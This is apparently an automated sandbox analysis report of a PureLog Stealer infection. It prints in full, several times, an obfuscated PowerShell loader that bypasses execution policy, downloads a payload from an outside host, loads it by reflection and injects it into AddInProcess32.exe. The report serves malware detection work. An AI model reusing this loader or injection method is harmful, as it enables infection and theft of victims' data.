            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_00407C97
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: powershell.exe, 00000004.00000002.2294500066.000001B0A7BC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end nodegraph_7-48774
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041CB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004432B5 mov eax, dword ptr fs:[00000030h]7_2_004432B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00412077 GetProcessHeap,HeapFree,7_2_00412077
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00434B47 SetUnhandledExceptionFilter,7_2_00434B47
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0043BB22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00434FDC

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Bypasses PowerShell execution policy
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 93A008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe7_2_004120F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00419627 mouse_event,7_2_00419627
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaokgdldc1wqvjjqwjmzsankk1ecionks5oyu1lwzmsmtesml0tsm9jbicnksaokcgnazgnkydmdscrj3inkydsid0gyzljahr0chm6ly9pyscrjzywmdewmc51cy4nkydhjysncmnoaxzljysnlm9yzy8ync9pdgvtcy9kzxrhac1ub3rllxyvrgv0yscrj2hob3rlvi50ehrjjysnouk7azhmyicrj2fzjysnzty0q29udccrj2vudca9iccrjyhojysnzxcttycrj2jqzwn0jysnifn5c3rlbscrjy5ozxquv2viq2xpzw50ks4nkydeb3dubg9hzccrj1n0jysncmlujysnzyhrogz1cmwpjysno2snkyc4zmjpbmenkydyeumnkydvbnrlbnqgpscrjybbjysnu3knkydzdgvtlkmnkydvbnynkydljysncnrdoicrjzpgcm9tqmfzzscrjzy0u3ryaw5nkgs4zmjhc2u2nemnkydvbnqnkydlbnqnkycpo2s4zmfzc2vtymx5id0gwycrj1jlzmxly3rpb24uqxnzzw1ibhldjysnojonkydmb2fkkccrj2s4zicrj2jpbmfyeunvbnqnkydlbnqpo2s4zicrj3r5cgugjysnpscrjybrogzhc3nlbscrj2jsjysnes4nkydhzxruexankydljysnkgm5jysnsvj1blbflkgnkydvbwvjoukpoycrj2s4zicrj21ldghvzca9iccrj2snkyc4znr5cgunkycur2v0twv0jysnag9kkgm5svzbswm5ssk7jysnazhmbwv0ag9klkludicrj29rzshrogzudwxslccrjybbb2inkydqzscrj2n0w11dqchjoukwl29tc2txl2qvzwuujysnzscrj3rzyxavlycrjzpzchr0agm5ssasjysnigm5jysnswqnkydlcycrj2f0axynkydhzccrj29jouknkycgjysnlcbjouknkydkzxnhdgknkyd2ywrvyzknkydjicwgyzknkydjzgvzjysnyxrpdmfkb2m5ssxjjysnoulbzgrjblbyb2nlc3mzmmm5ssxjouljoukpjysnkscpicaty1jfcgxbq0ugkftdsgfsxtk5k1tdsgfsxtu3k1tdsgfsxtczksxbq0hhul0zosaglxjfcexby0unazhmjyxbq0hhul0znikgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ((get-variable '*mdr*').name[3,11,2]-join'') ((('k8'+'fu'+'r'+'l = c9ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/deta'+'hnotev.txtc'+'9i;k8fb'+'as'+'e64cont'+'ent = '+'(n'+'ew-o'+'bject'+' system'+'.net.webclient).'+'download'+'st'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryc'+'ontent ='+' ['+'sy'+'stem.c'+'onv'+'e'+'rt]:'+':frombase'+'64string(k8fbase64c'+'ont'+'ent'+');k8fassembly = ['+'reflection.assembly]'+'::'+'load('+'k8f'+'binarycont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'gettyp'+'e'+'(c9'+'irunpe.h'+'omec9i);'+'k8f'+'method = '+'k'+'8ftype'+'.getmet'+'hod(c9ivaic9i);'+'k8fmethod.inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9i0/osskw/d/ee.'+'e'+'tsap//'+':sptthc9i ,'+' c9'+'id'+'es'+'ativ'+'ad'+'oc9i'+' '+', c9i'+'desati'+'vadoc9'+'i , c9'+'ides'+'ativadoc9i,c'+'9iaddinprocess32c9i,c9ic9i)'+')') -creplace ([char]99+[char]57+[char]73),[char]39 -replace'k8f',[char]36) )"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaokgdldc1wqvjjqwjmzsankk1ecionks5oyu1lwzmsmtesml0tsm9jbicnksaokcgnazgnkydmdscrj3inkydsid0gyzljahr0chm6ly9pyscrjzywmdewmc51cy4nkydhjysncmnoaxzljysnlm9yzy8ync9pdgvtcy9kzxrhac1ub3rllxyvrgv0yscrj2hob3rlvi50ehrjjysnouk7azhmyicrj2fzjysnzty0q29udccrj2vudca9iccrjyhojysnzxcttycrj2jqzwn0jysnifn5c3rlbscrjy5ozxquv2viq2xpzw50ks4nkydeb3dubg9hzccrj1n0jysncmlujysnzyhrogz1cmwpjysno2snkyc4zmjpbmenkydyeumnkydvbnrlbnqgpscrjybbjysnu3knkydzdgvtlkmnkydvbnynkydljysncnrdoicrjzpgcm9tqmfzzscrjzy0u3ryaw5nkgs4zmjhc2u2nemnkydvbnqnkydlbnqnkycpo2s4zmfzc2vtymx5id0gwycrj1jlzmxly3rpb24uqxnzzw1ibhldjysnojonkydmb2fkkccrj2s4zicrj2jpbmfyeunvbnqnkydlbnqpo2s4zicrj3r5cgugjysnpscrjybrogzhc3nlbscrj2jsjysnes4nkydhzxruexankydljysnkgm5jysnsvj1blbflkgnkydvbwvjoukpoycrj2s4zicrj21ldghvzca9iccrj2snkyc4znr5cgunkycur2v0twv0jysnag9kkgm5svzbswm5ssk7jysnazhmbwv0ag9klkludicrj29rzshrogzudwxslccrjybbb2inkydqzscrj2n0w11dqchjoukwl29tc2txl2qvzwuujysnzscrj3rzyxavlycrjzpzchr0agm5ssasjysnigm5jysnswqnkydlcycrj2f0axynkydhzccrj29jouknkycgjysnlcbjouknkydkzxnhdgknkyd2ywrvyzknkydjicwgyzknkydjzgvzjysnyxrpdmfkb2m5ssxjjysnoulbzgrjblbyb2nlc3mzmmm5ssxjouljoukpjysnkscpicaty1jfcgxbq0ugkftdsgfsxtk5k1tdsgfsxtu3k1tdsgfsxtczksxbq0hhul0zosaglxjfcexby0unazhmjyxbq0hhul0znikgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ((get-variable '*mdr*').name[3,11,2]-join'') ((('k8'+'fu'+'r'+'l = c9ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/deta'+'hnotev.txtc'+'9i;k8fb'+'as'+'e64cont'+'ent = '+'(n'+'ew-o'+'bject'+' system'+'.net.webclient).'+'download'+'st'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryc'+'ontent ='+' ['+'sy'+'stem.c'+'onv'+'e'+'rt]:'+':frombase'+'64string(k8fbase64c'+'ont'+'ent'+');k8fassembly = ['+'reflection.assembly]'+'::'+'load('+'k8f'+'binarycont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'gettyp'+'e'+'(c9'+'irunpe.h'+'omec9i);'+'k8f'+'method = '+'k'+'8ftype'+'.getmet'+'hod(c9ivaic9i);'+'k8fmethod.inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9i0/osskw/d/ee.'+'e'+'tsap//'+':sptthc9i ,'+' c9'+'id'+'es'+'ativ'+'ad'+'oc9i'+' '+', c9i'+'desati'+'vadoc9'+'i , c9'+'ides'+'ativadoc9i,c'+'9iaddinprocess32c9i,c9ic9i)'+')') -creplace ([char]99+[char]57+[char]73),[char]39 -replace'k8f',[char]36) )"Jump to behavior
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ0\
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagersInfo
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0\
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:0\
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:0\cf
            Source: AddInProcess32.exe, 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, registros.dat.7.drBinary or memory string: [Program Manager]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00434C52 cpuid 7_2_00434C52
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoA,7_2_0040F8D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,7_2_00452036
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_004520C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,7_2_00452313
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,7_2_00448404
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_0045243C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,7_2_00452543
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_00452610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,7_2_004488ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,7_2_00451CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,7_2_00451F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,7_2_00451F9B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00404F51 GetLocalTime,CreateEventA,CreateThread,7_2_00404F51
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041B60D GetComputerNameExW,GetUserNameW,7_2_0041B60D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,7_2_00449190
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected PureLog Stealer
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a055bad0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a7dc0000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a055bad0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a7dc0000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.2295468999.000001B0A7DC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2268054152.000001B09FD47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
